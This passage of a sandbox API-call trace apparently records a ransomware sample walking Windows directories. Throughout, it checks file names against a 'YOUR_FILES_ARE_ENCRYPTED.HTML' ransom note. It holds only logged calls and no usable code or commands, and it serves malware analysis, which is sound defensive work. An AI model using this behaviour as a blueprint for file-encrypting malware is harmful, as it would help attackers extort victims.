nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0169.003] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85f7a2c7, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0xcacd1780, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcacd1780, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.003] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85f7a2c7, 
ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0xcacd1780, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcacd1780, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="1.0", cAlternateFileName="")) returned 1 [0169.003] wnsprintfW (in: pszDest=0x749a470, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0") returned 54 [0169.003] GetProcessHeap () returned 0x270000 [0169.003] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74aa478 [0169.003] lstrcpyW (in: lpString1=0x74aa478, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0" [0169.003] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\*" [0169.003] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85f7a2c7, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0xcacd1780, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcacd1780, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0169.003] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85f7a2c7, 
ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0xcacd1780, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcacd1780, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.004] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x963315a8, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0xcacd1780, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcacd1780, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="en-US", cAlternateFileName="")) returned 1 [0169.004] wnsprintfW (in: pszDest=0x74aa478, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US") returned 60 [0169.004] GetProcessHeap () returned 0x270000 [0169.004] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7582858 [0169.005] lstrcpyW (in: lpString1=0x7582858, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US" [0169.005] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\*" [0169.006] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, 
ftCreationTime.dwLowDateTime=0x963315a8, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0xcacd1780, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcacd1780, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0169.006] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x963315a8, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0xcacd1780, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcacd1780, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.006] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x964fb1e0, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0xdb06b774, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xd56b6fd0, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0x2f22, dwReserved0=0x0, dwReserved1=0x60, cFileName="Help_CValidator.H1D", cAlternateFileName="HELP_C~1.H1D")) returned 1 [0169.006] wnsprintfW (in: pszDest=0x7582858, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_CValidator.H1D") returned 80 [0169.006] lstrcmpW (lpString1="Help_CValidator.H1D", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.006] PathFindExtensionW (pszPath="Help_CValidator.H1D") returned=".H1D" [0169.006] lstrlenW (lpString=".H1D") returned 4 [0169.006] PathFindExtensionW (pszPath="Help_CValidator.H1D") returned=".H1D" [0169.006] FindNextFileW (in: hFindFile=0x42f3240, 
lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x9662c4b0, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0xde50558e, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xde50558e, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0x365fc, dwReserved0=0x0, dwReserved1=0x60, cFileName="Help_MKWD_AssetId.H1W", cAlternateFileName="HELP_M~1.H1W")) returned 1 [0169.006] wnsprintfW (in: pszDest=0x7582858, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_AssetId.H1W") returned 82 [0169.006] lstrcmpW (lpString1="Help_MKWD_AssetId.H1W", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.006] PathFindExtensionW (pszPath="Help_MKWD_AssetId.H1W") returned=".H1W" [0169.006] lstrlenW (lpString=".H1W") returned 4 [0169.006] PathFindExtensionW (pszPath="Help_MKWD_AssetId.H1W") returned=".H1W" [0169.006] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x9662c4b0, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0xde6f5420, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xde6f5420, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0x325ec, dwReserved0=0x0, dwReserved1=0x60, cFileName="Help_MKWD_BestBet.H1W", cAlternateFileName="HELP_M~2.H1W")) returned 1 [0169.006] wnsprintfW (in: pszDest=0x7582858, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_BestBet.H1W") returned 82 [0169.006] lstrcmpW (lpString1="Help_MKWD_BestBet.H1W", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.006] PathFindExtensionW (pszPath="Help_MKWD_BestBet.H1W") returned=".H1W" [0169.006] lstrlenW (lpString=".H1W") 
returned 4 [0169.007] PathFindExtensionW (pszPath="Help_MKWD_BestBet.H1W") returned=".H1W" [0169.007] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x9662c4b0, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0xde767b2e, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xde767b2e, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0x79f16, dwReserved0=0x0, dwReserved1=0x60, cFileName="Help_MTOC_help.H1H", cAlternateFileName="HELP_M~1.H1H")) returned 1 [0169.007] wnsprintfW (in: pszDest=0x7582858, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MTOC_help.H1H") returned 79 [0169.007] lstrcmpW (lpString1="Help_MTOC_help.H1H", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.007] PathFindExtensionW (pszPath="Help_MTOC_help.H1H") returned=".H1H" [0169.007] lstrlenW (lpString=".H1H") returned 4 [0169.541] PathFindExtensionW (pszPath="Help_MTOC_help.H1H") returned=".H1H" [0169.541] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x98d10a72, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0xde767b2e, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xde767b2e, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0x3944, dwReserved0=0x0, dwReserved1=0x60, cFileName="Help_MValidator.H1D", cAlternateFileName="HELP_M~1.H1D")) returned 1 [0169.541] wnsprintfW (in: pszDest=0x7582858, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.H1D") returned 80 [0169.541] lstrcmpW (lpString1="Help_MValidator.H1D", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 
[0169.541] PathFindExtensionW (pszPath="Help_MValidator.H1D") returned=".H1D" [0169.541] lstrlenW (lpString=".H1D") returned 4 [0169.541] PathFindExtensionW (pszPath="Help_MValidator.H1D") returned=".H1D" [0169.541] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x9662c4b0, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0xde767b2e, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xde767b2e, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0x4, dwReserved0=0x0, dwReserved1=0x60, cFileName="Help_MValidator.Lck", cAlternateFileName="HELP_M~1.LCK")) returned 1 [0169.541] wnsprintfW (in: pszDest=0x7582858, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.Lck") returned 80 [0169.541] lstrcmpW (lpString1="Help_MValidator.Lck", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.541] PathFindExtensionW (pszPath="Help_MValidator.Lck") returned=".Lck" [0169.541] lstrlenW (lpString=".Lck") returned 4 [0169.541] PathFindExtensionW (pszPath="Help_MValidator.Lck") returned=".Lck" [0169.541] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x96bd5e0c, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0xde3156fc, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xde3156fc, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0xd53c7, dwReserved0=0x0, dwReserved1=0x60, cFileName="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q", cAlternateFileName="HELP{9~1.H1Q")) returned 1 [0169.542] wnsprintfW (in: pszDest=0x7582858, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All 
Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q") returned 107 [0169.542] lstrcmpW (lpString1="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.542] PathFindExtensionW (pszPath="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q") returned=".H1Q" [0169.542] lstrlenW (lpString=".H1Q") returned 4 [0169.542] PathFindExtensionW (pszPath="Help{9DAA54E8-CD95-4107-8E7F-BA3F24732D95}.H1Q") returned=".H1Q" [0169.542] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcacd1780, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcacd1780, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcacd1780, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.542] wnsprintfW (in: pszDest=0x7582858, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 90 [0169.542] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.542] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcacd1780, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcacd1780, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcacd1780, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.542] FindClose (in: hFindFile=0x42f3240 | out: 
hFindFile=0x42f3240) returned 1 [0169.542] wnsprintfW (in: pszDest=0x7582858, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 90 [0169.542] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\en-us\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.542] GetProcessHeap () returned 0x270000 [0169.543] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7582858 | out: hHeap=0x270000) returned 1 [0169.551] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcacd1780, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcacd1780, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcacd1780, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.551] wnsprintfW (in: pszDest=0x74aa478, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 84 [0169.551] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.551] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcacd1780, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcacd1780, ftLastAccessTime.dwHighDateTime=0x1d7fb46, 
ftLastWriteTime.dwLowDateTime=0xcacd1780, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.551] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0169.554] wnsprintfW (in: pszDest=0x74aa478, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 84 [0169.555] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.555] GetProcessHeap () returned 0x270000 [0169.556] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74aa478 | out: hHeap=0x270000) returned 1 [0169.567] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcacd1780, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcacd1780, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcacd1780, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.567] wnsprintfW (in: pszDest=0x749a470, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 80 [0169.567] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.567] FindNextFileW (in: 
hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcacd1780, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcacd1780, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcacd1780, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.567] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0169.567] wnsprintfW (in: pszDest=0x749a470, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 80 [0169.567] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.567] GetProcessHeap () returned 0x270000 [0169.569] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x749a470 | out: hHeap=0x270000) returned 1 [0169.580] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcacd1780, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcacd1780, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcacf78e0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.580] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: 
pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 73 [0169.580] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.580] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcacd1780, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcacd1780, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcacf78e0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.580] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0169.580] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 73 [0169.580] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\assistance\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.580] GetProcessHeap () returned 0x270000 [0169.581] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0169.583] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x19370e70, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcba0f1e0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcba0f1e0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, 
dwReserved0=0x0, dwReserved1=0x60, cFileName="ClickToRun", cAlternateFileName="CLICKT~1")) returned 1 [0169.583] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun") returned 43 [0169.583] GetProcessHeap () returned 0x270000 [0169.583] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0169.585] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun" [0169.585] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\*" [0169.585] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x19370e70, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcba0f1e0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcba0f1e0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0169.585] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x19370e70, ftCreationTime.dwHighDateTime=0x1d709b8, 